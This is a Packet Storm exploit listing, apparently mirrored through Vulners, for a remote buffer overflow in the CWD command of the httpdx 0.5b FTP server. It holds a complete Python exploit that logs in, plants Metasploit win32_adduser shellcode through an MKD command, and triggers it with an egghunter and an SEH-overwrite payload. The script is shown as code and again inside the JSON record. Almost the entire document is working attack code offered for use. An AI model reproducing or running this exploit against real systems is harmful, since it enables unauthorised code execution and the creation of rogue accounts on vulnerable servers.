Search...

httpdx 0.5b CWD Buffer Overflow

2009-05-19T00:00:00

ID PACKETSTORM:77632
Type packetstorm
Reporter His0k4
Modified 2009-05-19T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#[*] Usage : httpdx_cwd.py [target_ip] user pass   
#[*] Example : httpdx_cwd.py 192.168.1.3 ftp 123  
# Stack encouraged me to exploit this bug , so thx brotha  
# _ _ _ __ _ _ _   
#| || | (_) ___ / \ | |__ | | |   
#| __ | | | (_-&lt; | () | | / / |_ _|  
#|_||_| |_| /__/ \__/ |_\_\ |_|   
#  
#[*] Bug : httpdx &lt;= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)  
#[*] Refer : sico2819  
#[*] Tested on : Xp sp3 (EN)(VB)  
#[*] Exploited by : His0k4  
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com  
#[*] Serra7 Merra7 koulchi mderra7 :p  
  
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.  
  
import socket,sys,struct  
  
def banner():  
print "\nhttpdx &lt;= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.\n"  
print "By: His0k4\n"  
  
if len(sys.argv)!=4:  
banner()  
print "Usage: %s &lt;ip&gt; &lt;user&gt; &lt;pass&gt;" %sys.argv[0]  
sys.exit(0)  
  
# skape's egghunter shellcode  
shellunt=(  
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"  
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")  
  
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com  
shellcode=(  
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"  
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"  
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"  
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"  
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"  
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"  
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"  
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"  
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"  
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"  
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"  
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"  
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"  
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"  
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")  
  
payload = '\x41'*26  
payload += shellunt  
payload += '\xEB\xDE\x90\x90'  
payload += '\x87\x23\x02\x10'  
payload += '\x44'*900  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
s.connect((sys.argv[1],21))  
except:  
print "Can\'t connect to server!\n"  
sys.exit(0)  
  
s.recv(1024)  
s.send('USER '+sys.argv[2]+'\r\n')  
s.recv(1024)  
s.send('PASS '+sys.argv[3]+'\r\n')  
s.recv(1024)  
s.send('MKD '+shellcode+'\r\n') # i placed the shellcode in the MKD command ;)  
s.recv(1024)  
s.send('CWD '+payload+'\r\n')  
print ("Egghunter is hunting...;)")  
raw_input("[+] Shellcode will be executed when httpdx get closed")  
s.close()  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:77632", "type": "packetstorm", "bulletinFamily": "exploit", "title": "httpdx 0.5b CWD Buffer Overflow", "description": "", "published": "2009-05-19T00:00:00", "modified": "2009-05-19T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/77632/httpdx-0.5b-CWD-Buffer-Overflow.html", "reporter": "His0k4", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:34", "viewCount": 8, "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.1}, "sourceHref": "https://packetstormsecurity.com/files/download/77632/httpdxcwd-overflow.txt", "sourceData": "`#!/usr/bin/python \n#[*] Usage : httpdx_cwd.py [target_ip] user pass \n#[*] Example : httpdx_cwd.py 192.168.1.3 ftp 123 \n# Stack encouraged me to exploit this bug , so thx brotha \n# _ _ _ __ _ _ _ \n#| || | (_) ___ / \\ | |__ | | | \n#| __ | | | (_-< | () | | / / |_ _| \n#|_||_| |_| /__/ \\__/ |_\\_\\ |_| \n# \n#[*] Bug : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH) \n#[*] Refer : sico2819 \n#[*] Tested on : Xp sp3 (EN)(VB) \n#[*] Exploited by : His0k4 \n#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com \n#[*] Serra7 Merra7 koulchi mderra7 :p \n \n#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx. \n \nimport socket,sys,struct \n \ndef banner(): \nprint \"\\nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.\\n\" \nprint \"By: His0k4\\n\" \n \nif len(sys.argv)!=4: \nbanner() \nprint \"Usage: %s <ip> <user> <pass>\" %sys.argv[0] \nsys.exit(0) \n \n# skape's egghunter shellcode \nshellunt=( \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \n\"\\xef\\xb8\\x44\\x7A\\x32\\x37\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\") \n \n# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com \nshellcode=( \n\"\\x44\\x7A\\x32\\x37\\x44\\x7A\\x32\\x37\\x29\\xc9\\x83\\xe9\\xcd\\xd9\\xee\\xd9\" \n\"\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x05\\x16\\xf2\\x06\\x83\\xeb\\xfc\\xe2\\xf4\" \n\"\\xf9\\xfe\\xb6\\x06\\x05\\x16\\x79\\x43\\x39\\x9d\\x8e\\x03\\x7d\\x17\\x1d\\x8d\" \n\"\\x4a\\x0e\\x79\\x59\\x25\\x17\\x19\\x4f\\x8e\\x22\\x79\\x07\\xeb\\x27\\x32\\x9f\" \n\"\\xa9\\x92\\x32\\x72\\x02\\xd7\\x38\\x0b\\x04\\xd4\\x19\\xf2\\x3e\\x42\\xd6\\x02\" \n\"\\x70\\xf3\\x79\\x59\\x21\\x17\\x19\\x60\\x8e\\x1a\\xb9\\x8d\\x5a\\x0a\\xf3\\xed\" \n\"\\x8e\\x0a\\x79\\x07\\xee\\x9f\\xae\\x22\\x01\\xd5\\xc3\\xc6\\x61\\x9d\\xb2\\x36\" \n\"\\x80\\xd6\\x8a\\x0a\\x8e\\x56\\xfe\\x8d\\x75\\x0a\\x5f\\x8d\\x6d\\x1e\\x19\\x0f\" \n\"\\x8e\\x96\\x42\\x06\\x05\\x16\\x79\\x6e\\x39\\x49\\xc3\\xf0\\x65\\x40\\x7b\\xfe\" \n\"\\x86\\xd6\\x89\\x56\\x6d\\xe6\\x78\\x02\\x5a\\x7e\\x6a\\xf8\\x8f\\x18\\xa5\\xf9\" \n\"\\xe2\\x75\\x9f\\x62\\x2b\\x73\\x8a\\x63\\x25\\x39\\x91\\x26\\x6b\\x73\\x86\\x26\" \n\"\\x70\\x65\\x97\\x74\\x25\\x72\\x88\\x26\\x37\\x21\\xd2\\x29\\x44\\x52\\xb6\\x26\" \n\"\\x23\\x30\\xd2\\x68\\x60\\x62\\xd2\\x6a\\x6a\\x75\\x93\\x6a\\x62\\x64\\x9d\\x73\" \n\"\\x75\\x36\\xb3\\x62\\x68\\x7f\\x9c\\x6f\\x76\\x62\\x80\\x67\\x71\\x79\\x80\\x75\" \n\"\\x25\\x72\\x88\\x26\\x2a\\x57\\xb6\\x42\\x05\\x16\\xf2\\x06\") \n \npayload = '\\x41'*26 \npayload += shellunt \npayload += '\\xEB\\xDE\\x90\\x90' \npayload += '\\x87\\x23\\x02\\x10' \npayload += '\\x44'*900 \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \ns.connect((sys.argv[1],21)) \nexcept: \nprint \"Can\\'t connect to server!\\n\" \nsys.exit(0) \n \ns.recv(1024) \ns.send('USER '+sys.argv[2]+'\\r\\n') \ns.recv(1024) \ns.send('PASS '+sys.argv[3]+'\\r\\n') \ns.recv(1024) \ns.send('MKD '+shellcode+'\\r\\n') # i placed the shellcode in the MKD command ;) \ns.recv(1024) \ns.send('CWD '+payload+'\\r\\n') \nprint (\"Egghunter is hunting...;)\") \nraw_input(\"[+] Shellcode will be executed when httpdx get closed\") \ns.close() \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645335481}}